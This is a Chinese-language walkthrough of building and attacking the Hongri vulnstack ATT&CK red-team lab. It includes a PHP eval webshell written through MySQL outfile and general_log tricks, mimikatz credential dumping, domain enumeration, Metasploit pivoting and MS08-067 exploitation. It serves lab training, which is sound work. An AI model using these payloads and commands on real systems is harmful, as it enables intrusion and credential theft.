ATK&CK红队评估实战靶场(一)的搭建和模拟攻击过程全过程
*ATK&CK红队评估实战靶场(一)的搭建和模拟攻击过程全过程*
目录
ATK&CK红队评估实战靶场(一)的搭建和模拟攻击过程全过程
*0x01**前言*
本靶机环境本靶机环境是红日团队开源的一个红队实战测试环境,靶机下载地址如下:
http://vulnstack.qiyuanxuetang.net/vuln/detail/2/
通过模拟真实环境搭建的漏洞靶场,完全模拟ATK&CK攻击链路进行搭建,形成完整个闭环。虚拟机默认密码为hongrisec@2019,若登录失败,尝试Qwer1234。
*0x02**环境搭建*
Win7作为web服务器,连接外网。设置两块网卡,一块设置为NAT模式,模拟外网服务,一台设置为host模式,模拟内网环境。
Win7
外网IP:192.168.1.142
内网IP:192.168.52.143
开启内置的phpstudy,启动web服务。
Win server2003为域控,其域成员包括Win7,Win server2008。设置其地址为host模式,不出网,网段保持一致,设置为52段。
Win2003
内网IP:192.168.52.138
Win server 2008作为普通服务器,也设置为host模式。
Win2008内网IP:192.168.52.141
攻击机使用的为kali,和一台Win7物理机。网络模式设置为NAT即可。
测试一下是否能访问Win7服务。
)
如图成功访问。至此,环境搭建完毕,开始模拟攻击。
模拟攻击示意图如下:
*0x**03 WEB**攻击*
*3**.1**主机探测*
命令:netdiscover -i eth0 -r 192.168.1.0/24
发现192.168.1.142主机存活。
*3.**2**端口扫描*
命令:nmap -sC -v -n -sV -Pn -p 1-65535 192.168.1.142
发现80端口开启,访问192.168.1.142:80,发现大量信息泄露,收集有用信息。
*3**.3**目录扫描*
发现有Phpmyadmin和网站备份路径。这里只讲思路一。
*3.4**phpmyadmin利用*
进入页面,输入默认密码,root/root发现成功登入。
在SQL模块中插入sql语句
首先测试是否可以使用select into outfile直接写入
> Select '<?php eval($_POST[hack]);?> ' into outfile 'C:/phpStudy/WWW/hack.php'
写入失败, show global variables like ‘%secure%’
查看变量secure-file-priv 值为NULL,且为只读无法修改。
尝试使用全局日志写入shell,查看全局变量general_log:show global variables like ‘%general_%
’
开启全局日志并修改日志保存位置为C:/phpStudy/WWW/111.php
set global general_log=on;
set global general_log_file='C:/phpStudy/WWW/111.php';
查询一句话写入日志Select ''
利用菜刀进行一句话木马连接
发现成功连接,已进入网站后台。
*3**.5* *上线cs* *getshell并提权到system权限。*
提权成功
进行域信息收集。
输入 shell ipconfig/all
域名为god
内网ip为192.168.52.143
执行cs内置mimikaiz
跑出win7
明文密码 Qwer1234
可以远程连接桌面,至此Win7的控制权已拿下。
查看域信息
net group /domain #查看域内所有用户列表
net group “domain computers” /domain #查看域成员计算机列表
net group “domain admins” /domain #查看域管理员用户
本机计算机名字为STU1,另外还有两个域用户分别是DEV1、ROOT-TVI862UBEH、域控制用户为OWA
*0x**04* *内网信息收集*
前面收集到的信息Win7计算机名字为STU1,另外还有两个域用户分别是DEV1、ROOT-TVI862UBEH、域控制用户为OWA
win7内网的IP地址为192.168.52.143
进一步开始收集,通过Ladon 192.168.52.0/24 OnlinePC探测域内存活主机
域成员:192.168.52.141
域控DC:192.168.52.138
*4**.1**proxychain内网穿透*
利用kali的msf模块创建一个shell 上传到 win7上,建立连接。
并
添加路由
\1. run autoroute -s 192.168.52.0/24 添加路由
\2. run autorout -p 查看是否添加成功
\3. background 返回
\4. route print 输出路由
\5. use auxiliary/server/socks4a 使用 socks4a模块
\6. set srvport 1080 设置端口1080
\7. run 运行
使用namp发现可以连接目标内网主机,进行漏洞探测。
发现漏洞ms08-067,进入漏洞模块进行利用
成功返回shell,至此,域控 192.168.52.141已被拿下。
还有其他思路可以自己尝试。